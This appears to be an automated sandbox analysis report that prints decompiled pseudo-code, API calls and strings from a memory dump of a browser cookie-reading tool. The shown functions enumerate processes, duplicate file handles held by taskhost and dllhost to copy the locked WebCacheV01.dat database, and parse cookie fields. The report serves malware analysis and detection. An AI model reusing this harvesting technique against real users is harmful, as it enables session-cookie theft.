Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
_wcsicmp.MSVCRT ref: 0040C816
OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
memset.MSVCRT ref: 0040C8AF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
_wcsicmp.MSVCRT ref: 0040C902
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
String ID:
API String ID: 832456665-0
Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9FC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x412b10; // 0x10350e5a
								 *0x412b10 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040da09
0x0040da0f
0x0040da13
0x0040da20
0x0040da24
0x0040da2a
0x0040da32
0x0040da35
0x0040da3d
0x0040da41
0x0040da44
0x0040da47
0x0040da49
0x0040da49
0x0040da4d
0x0040da50
0x0040da60
0x0040da62
0x0040da66
0x0040da66
0x0040da6a
0x0040da6b
0x0040da74
0x0040da74
0x0040da3d
0x0040da32
0x0040da79
0x0040da7f

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
LockResource.KERNEL32(00000000), ref: 0040DA35

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C516, Relevance: 1.5, APIs: 1, Instructions: 11
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
				signed int _t5;
				long _t7;

				_t5 =  *__eax;
				if(_t5 == 0) {
					return _t5 | 0xffffffff;
				}
				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
				return _t7;
			}

0x0040c516
0x0040c51a
0x00000000
0x0040c52e
0x0040c52a
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE98, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
				char _v4;
				char _v8;
				struct HWND__* _v12;
				void* __edi;
				void* __esi;
				void* _t42;
				struct HWND__* _t53;
				void* _t60;
				struct HWND__* _t69;
				struct HWND__* _t71;
				struct HWND__* _t76;
				int _t82;
				int _t84;
				struct HWND__* _t85;
				void* _t93;
				struct HWND__* _t107;
				struct HWND__* _t108;

				_t93 = __edx;
				_t92 = __ecx;
				E0040E340(0x27a4, __ecx);
				_t42 = E00402754(_t92);
				if(_t42 != 0) {
					E0040DA9D();
					SetErrorMode(0x8001); // executed
					 *0x412b10 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
					E0040621C( &_v4);
					_push( &_a76);
					_a36 = 0x20;
					_a28 = 0;
					_a40 = 0;
					_a32 = 0;
					_a44.hwnd = 0;
					E0040BB15(__eflags);
					_a1800 =  &_v8;
					E004064A1(_t92, __eflags,  &_v8, _a12);
					_t53 = E004065C4(_a1792, L"/savelangfile");
					__eflags = _t53;
					if(_t53 < 0) {
						E00407259(); // executed
						__eflags = E004065C4(_a1800, L"/deleteregkey");
						if(__eflags < 0) {
							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
							if(__eflags <= 0) {
								L7:
								E0040BA94( &_a72);
								__eflags = _a664 - 3;
								if(_a664 != 3) {
									_push(5);
								} else {
									_push(3);
								}
								ShowWindow(_a592, ??);
								UpdateWindow(_a592);
								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
								__eflags = GetMessageW( &_a44, 0, 0, 0);
								while(__eflags != 0) {
									_t69 =  *0x412c2c; // 0x0
									__eflags = _t69;
									_t107 = _t69;
									if(_t69 == 0) {
										L14:
										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
										__eflags = _t71;
										if(_t71 == 0) {
											goto L15;
										}
									} else {
										_t85 = GetForegroundWindow();
										__eflags = _t107 - _t85;
										if(_t107 == _t85) {
											L15:
											_t108 =  *0x412c2c; // 0x0
											_v12 = _a1820;
											_t76 = IsDialogMessageW(_a592,  &_a44);
											__eflags = _t76;
											if(_t76 == 0) {
												__eflags = _t108;
												if(_t108 == 0) {
													L18:
													__eflags = _v12;
													if(_v12 == 0) {
														L20:
														TranslateMessage( &_a44);
														DispatchMessageW( &_a44);
													} else {
														_t82 = IsDialogMessageW(_v12,  &_a44);
														__eflags = _t82;
														if(_t82 == 0) {
															goto L20;
														}
													}
												} else {
													_t84 = IsDialogMessageW(_t108,  &_a44);
													__eflags = _t84;
													if(_t84 == 0) {
														goto L18;
													}
												}
											}
										} else {
											goto L14;
										}
									}
									__eflags = GetMessageW( &_a44, 0, 0, 0);
								}
							} else {
								__eflags = E0040BD40( &_a72, _t93, __eflags);
								if(__eflags == 0) {
									goto L7;
								}
							}
						}
					} else {
						 *0x4131d0 = 0x412374;
						E004073F7(_t92);
					}
					E0040BC51( &_a72, __eflags);
					E0040623E( &_v8);
					E00403F55( &_a24);
					E0040623E( &_v8);
					_t60 = 0;
					__eflags = 0;
				} else {
					_t60 = _t42 + 1;
				}
				return _t60;
			}

0x0040be98
0x0040be98
0x0040bea3
0x0040beab
0x0040beb2
0x0040beba
0x0040bec4
0x0040bed9
0x0040bee6
0x0040bef0
0x0040bef9
0x0040befa
0x0040bf02
0x0040bf06
0x0040bf0a
0x0040bf0e
0x0040bf12
0x0040bf1f
0x0040bf26
0x0040bf37
0x0040bf3c
0x0040bf3e
0x0040bf54
0x0040bf6a
0x0040bf6c
0x0040bf79
0x0040bf7d
0x0040bf90
0x0040bf94
0x0040bf99
0x0040bfa1
0x0040bfa7
0x0040bfa3
0x0040bfa3
0x0040bfa3
0x0040bfb0
0x0040bfbd
0x0040bfd1
0x0040bfe4
0x0040bfe6
0x0040bff2
0x0040bff7
0x0040bff9
0x0040bffb
0x0040c007
0x0040c01a
0x0040c020
0x0040c022
0x00000000
0x00000000
0x0040bffd
0x0040bffd
0x0040c003
0x0040c005
0x0040c024
0x0040c02b
0x0040c031
0x0040c041
0x0040c043
0x0040c045
0x0040c047
0x0040c049
0x0040c057
0x0040c057
0x0040c05b
0x0040c06c
0x0040c071
0x0040c07c
0x0040c05d
0x0040c066
0x0040c068
0x0040c06a
0x00000000
0x00000000
0x0040c06a
0x0040c04b
0x0040c051
0x0040c053
0x0040c055
0x00000000
0x00000000
0x0040c055
0x0040c049
0x00000000
0x00000000
0x00000000
0x0040c005
0x0040c090
0x0040c090
0x0040bf7f
0x0040bf88
0x0040bf8a
0x00000000
0x00000000
0x0040bf8a
0x0040bf7d
0x0040bf40
0x0040bf40
0x0040bf4a
0x0040bf4a
0x0040c09c
0x0040c0a5
0x0040c0ae
0x0040c0b7
0x0040c0bc
0x0040c0bc
0x0040beb4
0x0040beb4
0x0040beb4
0x0040c0c4

APIs

Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
EnumResourceTypesW.KERNEL32 ref: 0040BEE6

Strings

/savelangfile, xrefs: 0040BF32
/deleteregkey, xrefs: 0040BF60
, xrefs: 0040BEFA

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D071, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D071(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryW(L"psapi.dll"); // executed
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[4] = _t14;
					return _t14;
				}
				return _t7;
			}

0x0040d074
0x0040d07c
0x0040d08e
0x0040d099
0x0040d0a5
0x0040d0b1
0x0040d0bd
0x0040d0c9
0x0040d0cc
0x0040d0ce
0x00000000
0x0040d0d1
0x0040d0d2

APIs

LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,747859F0,0040CF75,?,?), ref: 0040D07C
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC

Strings

psapi.dll, xrefs: 0040D077
EnumProcessModules, xrefs: 0040D092
GetModuleInformation, xrefs: 0040D0C2
EnumProcessModulesEx, xrefs: 0040D09E
EnumProcesses, xrefs: 0040D0B6
GetModuleBaseNameW, xrefs: 0040D088
GetModuleFileNameExW, xrefs: 0040D0AA

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2238633743-4233621989
Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00403BAF, Relevance: 19.7, APIs: 4, Strings: 9, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				intOrPtr _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				void _v124;
				void _v132;
				void _v136;
				char _v140;
				char _v912;
				char _v936;
				char _v1496;
				char _v1500;
				void* __edi;
				void* __esi;
				void* _t89;
				signed int _t109;
				signed int _t114;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr* _t137;
				intOrPtr* _t139;
				void* _t142;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t151;
				void* _t163;

				_t151 = __edx;
				_v76 = 0x100;
				_v56 = 0x100;
				_v80 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				E00403E49( &_v1500);
				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
				_t164 = _t89;
				if(_t89 == 0) {
					L30:
					E00403E8F( &_v912);
					E00403F55( &_v936);
					E00406710( &_v1496);
					E00406355( &_v72);
					return E00406355( &_v92);
				} else {
					_v12 = 0x20;
					_v20 = 0;
					_v8 = 0;
					_v16 = 0;
					do {
						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
							_t161 =  &_v20;
							_v24 = E004039C1( &_v20, L"Name");
							_v28 = E004039C1( &_v20, L"Value");
							_v32 = E004039C1( &_v20, L"Path");
							_v36 = E004039C1( &_v20, L"RDomain");
							_v48 = E004039C1(_t161, L"Expires");
							_v52 = E004039C1(_t161, L"LastModified");
							_v44 = E004039C1(_t161, L"EntryId");
							_v40 = E004039C1(_t161, L"Flags");
							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
								_t109 = memset( &_v136, 0, 0x2c);
								_t163 = _t163 + 0xc;
								E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
								E0040518A( &_v92, _v36);
								_t114 = _v92;
								_v112 = 0x40f454;
								if(_t114 != 0) {
									_v112 = _t114;
								}
								E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
								E0040518A( &_v72, _v32);
								_t119 = _v72;
								_v116 = 0x40f454;
								if(_t119 != 0) {
									_v116 = _t119;
								}
								_t120 = _v24;
								_t147 =  *((intOrPtr*)(_t120 + 0x328));
								if(_t147 <= 0) {
									_v108 = 0x40f924;
								} else {
									_t139 = _t120 + 0x220;
									 *((char*)(_t147 +  *_t139 - 1)) = 0;
									_v108 =  *_t139;
								}
								_t121 = _v28;
								_t148 =  *((intOrPtr*)(_t121 + 0x328));
								if(_t148 <= 0) {
									_v104 = 0x40f924;
								} else {
									_t137 = _t121 + 0x220;
									 *((char*)( *_t137 + _t148 - 1)) = 0;
									_v104 =  *_t137;
								}
								_t122 = _v48;
								if(_t122 != 0) {
									memcpy( &_v132, _t122 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t123 = _v52;
								if(_t123 != 0) {
									memcpy( &_v124, _t123 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t124 = _v40;
								if(_t124 != 0) {
									_v96 =  *((intOrPtr*)(_t124 + 0x220));
								}
								_t125 = _v44;
								if(_t125 == 0) {
									_v140 = 0;
									_v136 = 0;
								} else {
									_v140 =  *((intOrPtr*)(_t125 + 0x220));
									_v136 =  *((intOrPtr*)(_t125 + 0x224));
								}
								_v100 = _a8;
								 *((intOrPtr*)( *_a4))( &_v140);
							}
						}
					} while (E0040489D( &_v1500) != 0);
					if(_v20 != 0) {
						free(_v20);
					}
					goto L30;
				}
			}

0x00403baf
0x00403bc1
0x00403bc4
0x00403bce
0x00403bd1
0x00403bd4
0x00403bd7
0x00403bda
0x00403bdd
0x00403be0
0x00403be3
0x00403be6
0x00403bfc
0x00403c01
0x00403c03
0x00403e11
0x00403e17
0x00403e22
0x00403e2d
0x00403e35
0x00403e46
0x00403c09
0x00403c09
0x00403c10
0x00403c13
0x00403c16
0x00403c19
0x00403c2b
0x00403c36
0x00403c43
0x00403c50
0x00403c5d
0x00403c6a
0x00403c77
0x00403c84
0x00403c91
0x00403c9c
0x00403c9f
0x00403cca
0x00403ccf
0x00403cde
0x00403ce8
0x00403ced
0x00403cf2
0x00403cf5
0x00403cf7
0x00403cf7
0x00403d01
0x00403d0b
0x00403d10
0x00403d15
0x00403d18
0x00403d1a
0x00403d1a
0x00403d1d
0x00403d20
0x00403d28
0x00403d3c
0x00403d2a
0x00403d2a
0x00403d31
0x00403d37
0x00403d37
0x00403d43
0x00403d46
0x00403d4e
0x00403d62
0x00403d50
0x00403d50
0x00403d57
0x00403d5d
0x00403d5d
0x00403d69
0x00403d6e
0x00403d7c
0x00403d81
0x00403d81
0x00403d84
0x00403d89
0x00403d97
0x00403d9c
0x00403d9c
0x00403d9f
0x00403da4
0x00403dac
0x00403dac
0x00403daf
0x00403db4
0x00403dd0
0x00403dd6
0x00403db6
0x00403dc2
0x00403dc8
0x00403dc8
0x00403de8
0x00403dee
0x00403dee
0x00403c9f
0x00403dfb
0x00403e06
0x00403e0b
0x00403e10
0x00000000
0x00403e06

APIs

Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F

Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0

free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B

Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA

memset.MSVCRT ref: 00403CCA

Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC

memcpy.MSVCRT ref: 00403D7C
memcpy.MSVCRT ref: 00403D97

Strings

Name, xrefs: 00403C31
EntryId, xrefs: 00403C7F
Expires, xrefs: 00403C65
Path, xrefs: 00403C4B
LastModified, xrefs: 00403C72
Flags, xrefs: 00403C8C
Value, xrefs: 00403C3E
RDomain, xrefs: 00403C58
, xrefs: 00403C09

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$_wcsicmpmemset$freewcslen
String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
API String ID: 4182952938-1692241855
Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58

Uniqueness

Uniqueness Score: -1.00%

Function 004039F6, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004039F6(void* __eax) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v52;
				void _v578;
				int _v580;
				void _v1106;
				long _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				signed short _t48;
				int _t55;
				void* _t60;
				signed int _t63;
				void* _t77;
				void* _t94;
				signed short* _t100;
				void* _t102;

				_t102 = __eax;
				_t44 =  *((intOrPtr*)(__eax + 0x63c));
				_t100 = __eax + 0x430;
				_v8 = 0;
				 *_t100 = 0;
				if(_t44 != 1) {
					__eflags = _t44 - 2;
					if(__eflags == 0) {
						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
						__eflags = _t48;
						if(_t48 == 0) {
							_v8 =  *((intOrPtr*)(_t102 + 0x418));
						}
					}
					L15:
					return _v8;
				}
				_v580 = 0;
				memset( &_v578, 0, 0x208);
				_v1108 = _v1108 & 0x00000000;
				memset( &_v1106, 0, 0x208);
				E0040DACC( &_v1108, 0); // executed
				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				_t12 = wcslen( &_v1108) + 1; // 0x1
				if(_t55 + _t12 >= 0x104) {
					_t15 =  &_v580;
					 *_t15 = _v580 & 0x00000000;
					__eflags =  *_t15;
				} else {
					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				}
				_t60 = E004057D1( &_v580);
				_t109 = _t60;
				_pop(_t94);
				if(_t60 == 0) {
					_v8 = 0xfffffffd;
				} else {
					_t90 = _t102 + 4;
					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
					_t110 = _t63;
					if(_t63 == 0) {
						_v20 = _v20 & _t63;
						_v16 = _v16 & _t63;
						_v12 = 0x1388;
						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
						E00406264( &_v52, _t94, L"taskhost.exe");
						E00406264( &_v52, _t94, L"taskhostex.exe");
						E00406264( &_v52, _t94, L"taskhostw.exe");
						E0040567E(_t100, L"ecv"); // executed
						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
						_t111 = _t77;
						_push(_t100);
						if(_t77 == 0) {
							_v8 = 0xfffffffe;
							DeleteFileW(??);
							 *_t100 =  *_t100 & 0x00000000;
							__eflags =  *_t100;
						} else {
							if(E00403FDE(_t90, _t111) == 0) {
								_v8 =  *((intOrPtr*)(_t102 + 0x418));
							}
						}
						E0040623E( &_v52);
						E00406710( &_v20);
					}
				}
			}

0x00403a01
0x00403a03
0x00403a0f
0x00403a15
0x00403a18
0x00403a1b
0x00403b86
0x00403b89
0x00403b95
0x00403b9a
0x00403b9c
0x00403ba4
0x00403ba4
0x00403b9c
0x00403ba7
0x00403bae
0x00403bae
0x00403a2f
0x00403a36
0x00403a3b
0x00403a50
0x00403a5e
0x00403a68
0x00403a7c
0x00403a86
0x00403aa3
0x00403aa3
0x00403aa3
0x00403a88
0x00403a9a
0x00403aa0
0x00403ab2
0x00403ab7
0x00403ab9
0x00403aba
0x00403b7d
0x00403ac0
0x00403ac6
0x00403acc
0x00403ad1
0x00403ad3
0x00403ad9
0x00403adc
0x00403ae2
0x00403af3
0x00403b00
0x00403b0d
0x00403b1a
0x00403b24
0x00403b3a
0x00403b3f
0x00403b41
0x00403b42
0x00403b5a
0x00403b61
0x00403b67
0x00403b67
0x00403b44
0x00403b4d
0x00403b55
0x00403b55
0x00403b4d
0x00403b6e
0x00403b76
0x00403b76
0x00403ad3

APIs

memset.MSVCRT ref: 00403A36
memset.MSVCRT ref: 00403A50

Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF

wcslen.MSVCRT ref: 00403A68
wcslen.MSVCRT ref: 00403A77

Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947

DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00403A63, 00403A8E
taskhostex.exe, xrefs: 00403B05
taskhostw.exe, xrefs: 00403B12
dllhost.exe, xrefs: 00403AEE
taskhost.exe, xrefs: 00403AF8
ecv, xrefs: 00403B1F

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
